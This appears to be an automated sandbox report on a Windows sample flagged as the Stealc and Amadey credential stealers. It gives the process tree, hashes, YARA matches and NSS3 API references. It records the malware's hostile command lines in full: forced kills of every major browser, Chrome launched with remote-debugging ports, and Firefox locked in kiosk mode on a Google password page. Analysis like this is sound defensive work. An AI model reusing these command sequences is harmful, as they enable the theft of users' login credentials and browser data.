Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xc10000
File size:	1'789'440 bytes
MD5 hash:	C524F231DBE4C55A328876F06E2A82D1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2130376795.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2129788119.000000000074E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1709468423.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2130376795.0000000000C11000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	14:35:07
Start date:	22/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	14:35:08
Start date:	22/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=2172,i,13112948501450984096,12498418281894245301,262144 /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	14:35:39
Start date:	22/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsKECFIDGCBF.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	14:35:39
Start date:	22/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	14:35:39
Start date:	22/11/2024
Path:	C:\Users\user\DocumentsKECFIDGCBF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\DocumentsKECFIDGCBF.exe"
Imagebase:	0x820000
File size:	1'881'600 bytes
MD5 hash:	09109FBE23B94BD3DC2605D7AB550CE3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000002.2158334223.0000000000821000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000003.2118042916.0000000005010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	14:35:42
Start date:	22/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0x9f0000
File size:	1'881'600 bytes
MD5 hash:	09109FBE23B94BD3DC2605D7AB550CE3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000003.2153154830.0000000005060000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000002.2193621172.00000000009F1000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	14:36:00
Start date:	22/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x9f0000
File size:	1'881'600 bytes
MD5 hash:	09109FBE23B94BD3DC2605D7AB550CE3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000B.00000003.2325476805.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000B.00000002.3080728163.00000000009F1000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	14:36:17
Start date:	22/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe"
Imagebase:	0xaf0000
File size:	4'419'072 bytes
MD5 hash:	3540F08B37B30B6C554E0E5FF05A8E97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 34%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	14:36:26
Start date:	22/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe"
Imagebase:	0xbc0000
File size:	1'856'000 bytes
MD5 hash:	6013BD0A6461EE49410F7032CA69EA31
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.2695338579.000000000150D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.2754545310.0000000001522000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.2660335894.000000000150E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.2746364474.0000000001519000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.2694420134.0000000001509000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.2695385436.0000000001519000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.2746298150.000000000150C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.2660487547.0000000001519000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.2719534998.0000000001519000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.2659619178.000000000150D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.2718825525.0000000001519000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.2718722019.000000000150C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 34%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	14:36:35
Start date:	22/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe"
Imagebase:	0xe10000
File size:	1'789'440 bytes
MD5 hash:	C524F231DBE4C55A328876F06E2A82D1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000F.00000002.2737911561.0000000000E11000.00000040.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000F.00000002.2743981437.000000000163E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000F.00000003.2687883624.0000000005150000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 42%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	14:36:40
Start date:	22/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe"
Imagebase:	0xbc0000
File size:	1'856'000 bytes
MD5 hash:	6013BD0A6461EE49410F7032CA69EA31
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000003.2810105120.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000003.2940443306.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	14:36:42
Start date:	22/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe"
Imagebase:	0x950000
File size:	923'136 bytes
MD5 hash:	1B2A1D49F92876B02C7B1BD1EC1EA860
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 32%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	14:36:42
Start date:	22/11/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM firefox.exe /T
Imagebase:	0xfd0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	14:36:42
Start date:	22/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	14:36:45
Start date:	22/11/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM chrome.exe /T
Imagebase:	0xfd0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	14:36:45
Start date:	22/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	14:36:45
Start date:	22/11/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM msedge.exe /T
Imagebase:	0xfd0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	14:36:45
Start date:	22/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	14:36:45
Start date:	22/11/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM opera.exe /T
Imagebase:	0xfd0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	14:36:45
Start date:	22/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	14:36:45
Start date:	22/11/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM brave.exe /T
Imagebase:	0xfd0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	14:36:45
Start date:	22/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	14:36:45
Start date:	22/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	14:36:45
Start date:	22/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	14:36:46
Start date:	22/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	14:36:46
Start date:	22/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2320 -parentBuildID 20230927232528 -prefsHandle 2256 -prefMapHandle 2248 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d6cb21c8-5f63-43c4-8208-5eeeb72c7a2d} 1700 "\\.\pipe\gecko-crash-server-pipe.1700" 19dd8070510 socket
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	14:36:48
Start date:	22/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe"
Imagebase:	0xe10000
File size:	1'789'440 bytes
MD5 hash:	C524F231DBE4C55A328876F06E2A82D1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000020.00000002.2912762087.0000000000E11000.00000040.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000020.00000003.2825521059.00000000057C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000020.00000002.2919990948.0000000001AAB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	14:36:52
Start date:	22/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4088 -parentBuildID 20230927232528 -prefsHandle 4064 -prefMapHandle 4060 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {26ed0bef-963d-49e6-b1bd-7b4e349261f5} 1700 "\\.\pipe\gecko-crash-server-pipe.1700" 19de8a0bc10 rdd
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	14:36:52
Start date:	22/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	14:36:52
Start date:	22/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe"
Imagebase:	0x700000
File size:	2'819'584 bytes
MD5 hash:	739F477149675DE9EA6D954BB446FFAE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 42%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	36
Start time:	14:36:55
Start date:	22/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2620 --field-trial-handle=2536,i,8133912956404692815,15819443204232451158,262144 /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	14:36:56
Start date:	22/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe"
Imagebase:	0x950000
File size:	923'136 bytes
MD5 hash:	1B2A1D49F92876B02C7B1BD1EC1EA860
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	14:36:57
Start date:	22/11/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM firefox.exe /T
Imagebase:	0xfd0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	14:36:57
Start date:	22/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	14:36:59
Start date:	22/11/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM chrome.exe /T
Imagebase:	0xfd0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	14:37:00
Start date:	22/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	14:37:01
Start date:	22/11/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM msedge.exe /T
Imagebase:	0xfd0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	14:37:01
Start date:	22/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	14:37:02
Start date:	22/11/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM opera.exe /T
Imagebase:	0xfd0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	14:37:02
Start date:	22/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	14:37:02
Start date:	22/11/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM brave.exe /T
Imagebase:	0xfd0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	14:37:02
Start date:	22/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	14:37:03
Start date:	22/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	49
Start time:	14:37:03
Start date:	22/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 6C586E90 Relevance: 142.5, APIs: 71, Strings: 10, Instructions: 783stringmemoryCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C6D2120,6C587E60), ref: 6C586EBC
TlsGetValue.KERNEL32 ref: 6C586EDF
EnterCriticalSection.KERNEL32(?), ref: 6C586EF3
PR_WaitCondVar.NSS3(000000FF), ref: 6C586F25

Part of subcall function 6C55A900: TlsGetValue.KERNEL32(00000000,?,6C6D14E4,?,6C4F4DD9), ref: 6C55A90F
Part of subcall function 6C55A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C55A94F

PR_Unlock.NSS3 ref: 6C586F68
PORT_ZAlloc_Util.NSS3(00000008), ref: 6C586FA9
TlsGetValue.KERNEL32 ref: 6C5870B4
EnterCriticalSection.KERNEL32(?), ref: 6C5870C8
PR_CallOnce.NSS3(6C6D24C0,6C5C7590), ref: 6C587104
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C587117
SECOID_Init.NSS3 ref: 6C587128
PORT_Alloc_Util.NSS3(00000057), ref: 6C58714E
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C58717F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5871A9
PR_NotifyAllCondVar.NSS3 ref: 6C5871CF
PR_Unlock.NSS3 ref: 6C5871DD
free.MOZGLUE(?), ref: 6C5871EE
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C587208
free.MOZGLUE(00000000), ref: 6C587221
free.MOZGLUE(00000001), ref: 6C587235
TlsGetValue.KERNEL32 ref: 6C58724A
EnterCriticalSection.KERNEL32(?), ref: 6C58725E
